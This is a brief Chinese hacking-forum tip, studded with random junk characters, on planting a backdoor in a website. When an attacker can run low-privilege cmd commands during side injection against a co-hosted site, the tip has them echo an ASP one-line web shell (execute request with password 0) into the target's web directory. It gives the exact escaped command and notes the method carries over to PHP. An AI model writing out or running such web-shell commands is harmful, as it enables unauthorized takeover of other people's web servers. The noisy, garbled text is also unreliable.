在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。: Y$ `9 a u' G# x! ?# \
* C8 u9 p; z' i1 P) {
命令格式
' T( \- T/ x; l* v: C% Q+ L5 `
3 `9 m9 f) }7 i& Y; p- I* ?3 I% QEcho 语句 >目标站绝对目录. ^* H4 m( y3 h& p
# { f. H) F2 W# p, Q例如:
7 r; D9 C0 ^, e
- r5 n b! V( g1 Lecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp, f; \! L0 a8 J! K$ X
" e; x% F8 f6 i# H9 w这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
9 q4 m, ?0 I0 F3 r7 L |